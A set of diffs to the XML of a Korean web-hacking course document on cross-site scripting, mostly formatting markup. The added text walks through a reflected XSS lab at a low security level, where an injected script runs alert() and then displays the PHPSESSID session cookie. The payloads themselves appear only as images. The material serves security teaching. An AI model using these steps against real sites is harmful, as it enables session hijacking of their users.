--- a/화이트해커를위한웹해킹의기술/5.크로스사이트스크립팅공격.docx
+++ b/화이트해커를위한웹해킹의기술/5.크로스사이트스크립팅공격.docx
@@ -101,7 +101,6 @@
       <w:pPr>
         <w:spacing w:after="0"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
@@ -233,7 +232,6 @@
       <w:pPr>
         <w:spacing w:after="0"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
@@ -486,6 +484,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
@@ -662,7 +661,6 @@
         <w:spacing w:after="0"/>
         <w:ind w:leftChars="200" w:left="440"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
@@ -675,6 +673,770 @@
         </w:rPr>
         <w:t>5) 공격자가 이 세션 쿠키를 사용하여 해당 사용자의 권한으로 접속</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:wordWrap/>
+        <w:autoSpaceDE/>
+        <w:autoSpaceDN/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="100" w:left="220"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">2. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>리플렉티드</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 크로스 사이트 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>스크립팅</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>(Reflected XSS) 공격 실습</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="500F30A2" wp14:editId="2CDEF898">
+            <wp:extent cx="4343400" cy="4065349"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1809156261" name="그림 1" descr="텍스트, 전자제품, 스크린샷, 소프트웨어이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1809156261" name="그림 1" descr="텍스트, 전자제품, 스크린샷, 소프트웨어이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4347930" cy="4069589"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;보안 레벨 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>Low /</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> XSS (Reflected)&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>- 해당 페이지는 이름을 물어보는 폼 표시</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>- 입력란에 이름을 입력하면 다음과 같은 문구 출력</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F782F27" wp14:editId="31A67EF6">
+            <wp:extent cx="4923367" cy="1087600"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="867363293" name="그림 1" descr="텍스트, 스크린샷, 폰트, 라인이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="867363293" name="그림 1" descr="텍스트, 스크린샷, 폰트, 라인이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4943140" cy="1091968"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>- Hello 뒤에 입력 값이 그대로 다시 출력</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- 어떤 웹 애플리케이션이 사용자가 입력한 값을 그대로 출력하는 경우, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>리플렉티드</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 크로스 사이트 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>스크립팅</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 취약점이 존재할 가능성 높음</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>해당 취약점이 존재하는지 확인하기 가장 간단한 방법은 스크립트 태그 입력해보는 것</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F25D4F1" wp14:editId="170619DE">
+            <wp:extent cx="3843867" cy="374985"/>
+            <wp:effectExtent l="0" t="0" r="4445" b="6350"/>
+            <wp:docPr id="1034895267" name="그림 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1034895267" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3903508" cy="380803"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09E51534" wp14:editId="4DDC8063">
+            <wp:extent cx="3843655" cy="1083392"/>
+            <wp:effectExtent l="0" t="0" r="4445" b="2540"/>
+            <wp:docPr id="191484523" name="그림 1" descr="텍스트, 스크린샷, 폰트, 멀티미디어이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="191484523" name="그림 1" descr="텍스트, 스크린샷, 폰트, 멀티미디어이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3858571" cy="1087596"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>- 자바스크립트 함수 alert()에 의해 1이란 입력 값 출력 -&gt; 입력한 자바스크립트가 웹 브라우저에서 실행</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- 스크립트를 입력할 수 있고, 입력된 스크립트가 응답되어 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>리플렉티드</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 크로스 사이트 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>스크립팅</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 취약점이 존재한다는 것을 확인</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:wordWrap/>
+        <w:autoSpaceDE/>
+        <w:autoSpaceDN/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09D8D943" wp14:editId="0A406DFC">
+            <wp:extent cx="4148667" cy="343278"/>
+            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
+            <wp:docPr id="1397023588" name="그림 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1397023588" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4172659" cy="345263"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59F948D8" wp14:editId="1E139899">
+            <wp:extent cx="4186767" cy="1330117"/>
+            <wp:effectExtent l="0" t="0" r="4445" b="3810"/>
+            <wp:docPr id="185811716" name="그림 1" descr="텍스트, 스크린샷, 폰트이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="185811716" name="그림 1" descr="텍스트, 스크린샷, 폰트이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4211607" cy="1338009"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>- 스크립트를 위와 같이 입력하면, 쿠키를 출력</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>- PHPSESSID는 PHP에서 생성하는 세션 쿠키</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- 크로스 사이트 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>스크립팅</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 공격은 주로 세션 쿠키를 알아내는 데 초점</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>

--- a/화이트해커를위한웹해킹의기술/5.크로스사이트스크립팅공격.docx
+++ b/화이트해커를위한웹해킹의기술/5.크로스사이트스크립팅공격.docx
@@ -766,6 +766,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
@@ -906,6 +907,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
@@ -1056,6 +1058,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
@@ -1108,6 +1111,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
@@ -1251,6 +1255,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
@@ -1298,13 +1303,13 @@
         <w:ind w:leftChars="200" w:left="440"/>
         <w:jc w:val="center"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
@@ -1432,11 +1437,18 @@
         <w:spacing w:after="0"/>
         <w:ind w:leftChars="200" w:left="440"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>

--- a/화이트해커를위한웹해킹의기술/5.크로스사이트스크립팅공격.docx
+++ b/화이트해커를위한웹해킹의기술/5.크로스사이트스크립팅공격.docx
@@ -1436,19 +1436,903 @@
       <w:pPr>
         <w:spacing w:after="0"/>
         <w:ind w:leftChars="200" w:left="440"/>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3445737D" wp14:editId="139B55D9">
+            <wp:extent cx="4131733" cy="600337"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
